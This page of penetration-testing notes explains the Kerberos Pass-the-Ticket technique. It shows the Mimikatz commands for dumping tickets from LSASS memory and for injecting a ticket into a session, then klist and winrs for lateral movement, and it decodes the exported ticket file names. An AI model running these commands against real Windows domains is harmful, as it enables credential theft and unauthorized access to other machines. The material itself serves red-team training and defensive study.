Skip to main content

Pass The Ticket

Required Privileges: Administrators
  • Extracting Ticket Granting Services Will Require us to have Administrator's Credentials.
Required Privileges: Standard
  • Injecting Tickets in our own Session Doesn't Require Administrator Privileges.

Sometimes it will be possible to extract Kerberos Tickets and Session Keys from LSASS Memory using Mimikatz. The process usually requires us to have SYSTEM Privileges on the Target Machine.


privilege::debug
sekurlsa::tickets /export

While Mimikatz can extract any TGT or TGS Available from the Memory of the LSASS Process, most of the time, we'll be interested in TGT's as they can be used to request access to any Services the user is allowed to access. At the same time, TGSs are only good for a specific service.

Extracting TGT's will require us to have Administrator's Credentials, and extracting TGSs can be done with a Low-Privileged Account [Only the ones assigned to that Account]


Using the Ticket

:: Injecting the Ticket
kerberos::ptt [0;e06e9]-0-0-40a50000-delilah.gomez@LDAP-DC.DOMAIN.com.kirbi

Injecting Tickets in our own Session doesn't require Administrator Privileges. After this, the tickets will be available for any Tools we use for Lateral Movement.

:: Displays a list of currently Cached Kerberos Tickets
klist

Once we have a Command Prompt with the Credentials Loaded we can use winrs to connect to another TARGET on the Domain since the Credentials are Injected into our Session.

:: The [Username - Password] Fields are not Necessary because the Credentials are already Injected
winrs.exe -r:TARGET cmd

Deeper Explanation

Once the Tickets are Extracted they are going to be Available in the same Folder as Mimikatz.

[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-DOMAIN.COM.kirbi
└───────┘ ^ └────────┘ └─────────────┘ └───────────────┘└────┘
| | | | | └─────► 6. File Extension
| | | | |
| | | | └─────► 5. Resource
| | | |
| | | └─────► 4. User - Computer Account [Ticket Owner]
| | |
| | └─────► 3. 0x40e10000 Kerberos Flag
| |
| └─────► 2. Kerberos Ticket Type
| 0 = TGS / 1 = Client Ticket / 2 = TGT
|
└─────► 1. 0x97d82 User LUID